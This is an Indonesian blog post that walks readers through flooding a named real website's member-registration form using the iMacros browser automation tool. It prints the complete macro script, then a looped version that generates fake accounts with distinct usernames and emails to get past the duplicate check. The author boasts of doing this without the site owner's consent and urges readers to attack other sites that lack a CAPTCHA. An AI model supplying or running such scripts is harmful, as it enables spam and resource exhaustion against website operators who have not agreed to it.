Jumat, 05 Februari 2010

Flooding Form Pengisian Dengan Aplikasi iMacros

Judul : Flooding Form Pengisian Dengan Aplikasi iMacros
Penulis : surya kubiwa

Posting ini masih di seputar blog-nya mas Rudi yang beralamat di http://rudi.darmajaya.ac.id/ yang menurut gw masih ada kelemahan (hmmm... gara gara dapet hadiah Javascript malah tambah semangat untuk mencoba coba... hehehehee... maaf mas, cuma untuk pembelajaran aja :P ). Setelah gw liat liat lagi rupanya website ini belum punya satpam untuk mengatasi input di form pengisiannya atao lebih dikenal dengan captcha (baca http://id.wikipedia.org/wiki/CAPTCHA), setelah gw liat semua form-nya, ada 1 form yang agak susah untuk di flooding yaitu form register anggota baru yang beralamat di http://rudi.darmajaya.ac.id/?p=daftar karena form ini tidak mengijinkan penggunaan username dan email dengan nama yang sama. Hm... Di posting ini kita akan mem-flooding-nya dengan bantuan software iMacros yang dapet berintegrasi dengan browser (disini gw ngegunain Mozilla Firefox).

Oke, praktek :

Pertama yang kita butuhin cuma software iMacros yang dapat di donlod di http://www.iopus.com/download/imacros/, setelah donlod selesai terus di instal aja. Ikuti petunjuk penginstalan.

Sudah itu buka browser kita, software iMacros berada di toolbox bagian atas browser, seperti gambar di bawah ini


klik toolbox tersebut dan tentu kita buka alamat register anggota dari blog mas Rudi yang beralamat di http://rudi.darmajaya.ac.id/?p=daftar seperti gambar di bawah ini (aplikasi iMacros berada di sebelah kanan dan blog mas Rudi berada di sebelah kiri)


Oke, dari sini mohon diperhatikan baik baik.. Pertama kita klik tab Rec pada aplikasi iMacros lalu kita klik tombol Record lalu isi Registrasi anggotanya sesuka hati, setelah pengisian form register sukses yang ditandai dengan pemberitahuan seperti di bawah ini


lalu klik tombol Stop pada aplikasi iMacros, lalu klik tombol Save pada aplikasi iMacros, beri nama Save As-nya (nama yang gw pake pada contoh ini yaitu Banjir ). Setelah itu kita klik nama Save As-an kita tadi (letak nama ini ada di dalam aplikasi iMacros bagian atas yang berada dalam scroll box). Setelah di klik nama Save As-nya, lalu kita klik tab Edit lalu klik tombol Edit Macro maka akan muncul box programming seperti gambar di bawah ini


source code box diatas :

VERSION BUILD=6311226 RECORDER=FX
TAB T=1
URL GOTO=http://rudi.darmajaya.ac.id/?p=daftar
FRAME F=0
TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:fdaftar ATTR=NAME:i_user CONTENT=username_rahasia
SET !ENCRYPTION NO
TAG POS=1 TYPE=INPUT:PASSWORD FORM=NAME:fdaftar ATTR=NAME:i_pass CONTENT=rahasia
SET !ENCRYPTION NO
TAG POS=1 TYPE=INPUT:PASSWORD FORM=NAME:fdaftar ATTR=NAME:i_pass2 CONTENT=rahasia
TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:fdaftar ATTR=NAME:i_nama CONTENT=namalengkap
TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:fdaftar ATTR=NAME:i_alamat CONTENT=alamat
TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:fdaftar ATTR=NAME:i_kota CONTENT=kota
TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:fdaftar ATTR=NAME:i_provinsi CONTENT=provinsi
TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:fdaftar ATTR=NAME:i_negara CONTENT=negara
TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:fdaftar ATTR=NAME:i_email CONTENT=email_rahasia@mail.com
TAG POS=1 TYPE=TEXTAREA FORM=NAME:fdaftar ATTR=NAME:i_tentang CONTENT=tentangaku
TAG POS=1 TYPE=INPUT:SUBMIT FORM=NAME:fdaftar ATTR=NAME:daftar_it&&VALUE:Submit

agar kita dapat mem-flooding dengan usernama dan email yang berbeda (karena blog ini tidak mengijinkan penggunaan usernama dan email yang sama) maka kita menambahkan beberapa perintah pemrograman lagi, disini gw menggunakan perintah Loop, maka soure code-nya menjadi :

VERSION BUILD=6311226 RECORDER=FX
TAB T=1
URL GOTO=http://rudi.darmajaya.ac.id/?p=daftar
FRAME F=0
TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:fdaftar ATTR=NAME:i_user CONTENT=username{{!loop}}
SET !ENCRYPTION NO
TAG POS=1 TYPE=INPUT:PASSWORD FORM=NAME:fdaftar ATTR=NAME:i_pass CONTENT=rahasia
SET !ENCRYPTION NO
TAG POS=1 TYPE=INPUT:PASSWORD FORM=NAME:fdaftar ATTR=NAME:i_pass2 CONTENT=rahasia
TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:fdaftar ATTR=NAME:i_nama CONTENT=namalengkap
TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:fdaftar ATTR=NAME:i_alamat CONTENT=alamat
TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:fdaftar ATTR=NAME:i_kota CONTENT=kota
TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:fdaftar ATTR=NAME:i_provinsi CONTENT=provinsi
TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:fdaftar ATTR=NAME:i_negara CONTENT=negara
TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:fdaftar ATTR=NAME:i_email CONTENT=email{{!loop}}@mail.com
TAG POS=1 TYPE=TEXTAREA FORM=NAME:fdaftar ATTR=NAME:i_tentang CONTENT=tentangaku
TAG POS=1 TYPE=INPUT:SUBMIT FORM=NAME:fdaftar ATTR=NAME:daftar_it&&VALUE:Submit

setelah itu Save & Close. Untuk mempelajari perintah perintah pemrograman iMacros dapat membacanya di http://wiki.imacros.net/Main_Page. Selesai sudah setting aplikasi iMacros untuk mem-flooding form pengisian.

Selanjutnya kita akan menjalankannya, klik tab Play terus pada textbox Max kita isikan nilai berapapun (nilai ini untuk mem-flooding), disini gw mengisikan dengan nilai 7 lalu klik tombol Play (Loop), tunggu proses berjalan lalu liat hasilnya.

Cek printscreen sebelum dan sesudah proses

sebelum

sesudah

Wah gak keliatan hasil printscreen-nya.. Tapi silakan dicoba deh, coz gw sudah dengan suksesnya mem-flooding form register blog mas Rudi yang tanpa keamanan, gimana kalo gw flooding sampe 10000 ya? Hehehehehe... Form pengisian yang laen juga bisa, silakan login dan daftarkan diri lalu mencoba aplikasi iMacros ini di form yang laennya atao website atao blog yang laennya yang tanpa menggunakan fitur keamanan seperti captcha coz kemungkinan blog-nya mas Rudi sudah diperbaiki setelah dia membaca posting ini... Hehehehehehee..

To mas Rudi : Maaf mas, blog-nya jadi bahan percobaan.. :P
Reactions: